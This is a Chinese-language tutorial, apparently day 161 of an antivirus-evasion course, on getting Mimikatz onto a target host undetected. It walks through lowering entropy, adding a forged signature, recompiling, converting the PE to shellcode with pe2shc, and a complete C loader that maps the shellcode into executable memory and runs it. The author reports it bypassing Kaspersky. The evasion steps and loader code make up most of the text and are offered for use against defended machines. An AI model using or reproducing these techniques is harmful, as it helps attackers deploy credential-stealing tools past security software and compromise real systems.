免杀对抗------第一百六十一天
安全工具篇&MIMikatz&提权EXP&非源码修改方式&PE转ShellCode&融入加载
前置知识
- 来到免杀的最后一部分内容,之后这几讲针对的是一些安全工具的免杀,因为很多黑客工具(C2、nc、Mimikatz等)都会被杀软标记并查杀,所以这几节我们学习的就是如何让他们放到目标主机上不被干掉
- 那我们和之前的ShellCode免杀一样,可以从如下两方面入手:
- 成品EXE
- 程序源代码
- 因此首先我们需要分析的就是:
- 安全工具是否具有源代码
- 安全工具源代码逻辑的复杂程度
- 当前源代码你是否具有能力去修改
- 然后我们还需要考虑:
- 如果没有源代码或者没有修改的能力怎么办
- 在修改的时候发生各种异常bug或者打包问题怎么办
- 修改重打包之后的免杀效果也不太好时怎么办
- 那针对上面的这样一些情况,我们可以采用如下的两种方式去处理:
- 非源码修改方式 :
- 直接对EXE程序加壳、加保护、签名、详细信息、熵等
- 转换为ShellCode然后利用加载器进行加载到内存上线
- 源码修改方式 :
- 魔改源码打乱特征的方法重新定义工具
- 参考源码自己写一个同类工具
- 非源码修改方式 :
- 那免杀的效果也是从上到下依次递增,当然难度也逐渐递增,本节课我们就以Mimikatz工具针对于第一种非源码修改方式去看看效果
- mimikatz下载地址:gentilkiwi/mimikatz: A little tool to play with Windows security
- 直接上传到目标主机直接就给杀了,火绒都过不了:

安全工具 - EXE处理-减少熵值&自签名&详细信息
-
首先我们如果要直接对EXE成品文件进行免杀的话,根据之前的内容的就是减小熵值、加签名等等操作
-
那所以直接用我们的工具Restorator进行操作:

-
然后用我们的加签名工具Sign-Sacker加上签名:

-
然后再放到目标主机上,会发现没有任何屁用,依旧被火绒给干掉了:

-
根本原因就是因为源码没有改动,特征码被识别,但是这种方法针对360还是有一定用处的
-
当然因为这里可以直接下载源码,所以我们可以将源码下载下来本地打包一下,有时候也能起到一定的免杀效果
-
用VS打开,先尝试编译一下看能不能正常生成EXE文件,如果报错"Microsoft.CppBuild.targets(463,5): error MSB8020: 无法找到 v141_xp 的生成工具(平台工具集 ="v141_xp")..."的问题,那就在如下这几个文件夹中将所有
.vcxproj文件中的v141_xp替换为自己的工具集版本,我这里是v143: -
如果报错"Microsoft\VC\v170\Microsoft.CppBuild.targets(504,5): error MSB8041: 此项目需要 MFC 库...",那么打开
Visual Studio Installer软件,点击修改下载红色框中选中的内容即可,参考解决链接:https://blog.51cto.com/u_15707179/12789442

-
下载完成后打开VS选择项目属性,修改如下配置:

-
之后生成项目即可编译成功,但是这个也是没有,依旧被查杀,所以第一种方式直接对成品EXE程序下手实现免杀是很难的
安全工具 - EXE处理-PE转ShellCode&加载分离混淆
- 于是我们介绍第二种方式,既然直接对EXE修改没有效果,因为有特征码,那我们将该EXE转为二进制的形式,通过Loader加载到内存,像之前的ShellCode一样就可以尝试绕过特征码检测实现免杀
- 这里我们可以用到这个工具进行转换:hasherezade/pe_to_shellcode: Converts PE into a shellcode
shell
.\pe2shc.exe mimikatz mm.bin
- 然后我们可以通过它自带的加载器加载:
shell
.\runshc64.exe mm.bin
- 但是吧,这个工具特征好像也有点明显了,这个mm.bin文件也会被直接杀掉,所以我们要么异或一下,要么换个工具
- 这里我就直接换个工具了,也懒得写脚本了,新工具地址:Shellcode_Build
- 当然,我们也不可能直接用它的这个加载器,因为它的这玩意也是被杀得不要不要的,这里我们就搬出之前的加载器用一用,或者让AI帮我们写一个:
c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
int main() {
// 1. 打开bin文件
FILE* file = fopen("xx.bin", "rb");
if (!file) {
printf("无法打开文件 xx.bin\n");
return 1;
}
// 2. 获取文件大小
fseek(file, 0, SEEK_END);
long fileSize = ftell(file);
fseek(file, 0, SEEK_SET);
// 3. 分配内存
unsigned char* buffer = (unsigned char*)malloc(fileSize);
if (!buffer) {
printf("内存分配失败\n");
fclose(file);
return 1;
}
// 4. 读取文件内容
size_t bytesRead = fread(buffer, 1, fileSize, file);
fclose(file);
if (bytesRead != fileSize) {
printf("文件读取不完整\n");
free(buffer);
return 1;
}
printf("成功加载 %zd 字节\n", bytesRead);
// 5. 分配可执行内存
void* execMem = VirtualAlloc(NULL, fileSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!execMem) {
printf("无法分配可执行内存\n");
free(buffer);
return 1;
}
// 6. 将shellcode复制到可执行内存
memcpy(execMem, buffer, fileSize);
// 7. 执行shellcode
printf("正在执行ShellCode...\n");
((void(*)())execMem)();
// 8. 清理
VirtualFree(execMem, 0, MEM_RELEASE);
free(buffer);
return 0;
}
-
可以看到能够成功过掉卡巴,然后也能正常运行:


-
所以以后如果需要上传一些工具到目标主机上时,可以使用这种方式去进行加载使用,目前看来效果其实还可以,因为我们之前的加载器免杀方式其实有很多,只需要对着改即可
